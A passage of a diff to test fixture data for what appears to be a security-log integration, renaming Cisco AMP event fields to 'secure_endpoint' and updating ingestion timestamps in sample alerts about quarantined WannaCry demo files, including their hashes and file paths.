                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2600,7 +2600,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2661,7 +2661,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510388218Z",
+                "ingested": "2021-09-27T00:41:33.420977517Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2671,7 +2671,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2732,7 +2732,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510390180Z",
+                "ingested": "2021-09-27T00:41:33.420979402Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2742,7 +2742,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2803,7 +2803,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510392045Z",
+                "ingested": "2021-09-27T00:41:33.420981158Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2813,7 +2813,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2878,7 +2878,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510393933Z",
+                "ingested": "2021-09-27T00:41:33.420982902Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2888,7 +2888,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2953,7 +2953,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510395806Z",
+                "ingested": "2021-09-27T00:41:33.420984654Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2963,7 +2963,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3028,7 +3028,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510397685Z",
+                "ingested": "2021-09-27T00:41:33.420986407Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3038,7 +3038,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3128,7 +3128,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510399559Z",
+                "ingested": "2021-09-27T00:41:33.420988187Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3139,7 +3139,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.2CA2D550E6-100.SBX.VIOC",
                     "computer": {
                         "active": true,
@@ -3230,7 +3230,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510401442Z",
+                "ingested": "2021-09-27T00:41:33.420989931Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3241,7 +3241,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.4A468603FD.04426d77.auto.Talos",
                     "computer": {
                         "active": true,
@@ -3307,7 +3307,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510403305Z",
+                "ingested": "2021-09-27T00:41:33.420991687Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -3317,7 +3317,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3378,7 +3378,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510405200Z",
+                "ingested": "2021-09-27T00:41:33.420993431Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -3388,7 +3388,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3465,7 +3465,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510407053Z",
+                "ingested": "2021-09-27T00:41:33.420995187Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3476,7 +3476,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -3554,7 +3554,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510408937Z",
+                "ingested": "2021-09-27T00:41:33.420996955Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3565,7 +3565,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -3650,7 +3650,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510410809Z",
+                "ingested": "2021-09-27T00:41:33.420998706Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3661,7 +3661,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -3750,7 +3750,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510412707Z",
+                "ingested": "2021-09-27T00:41:33.421000462Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea0470348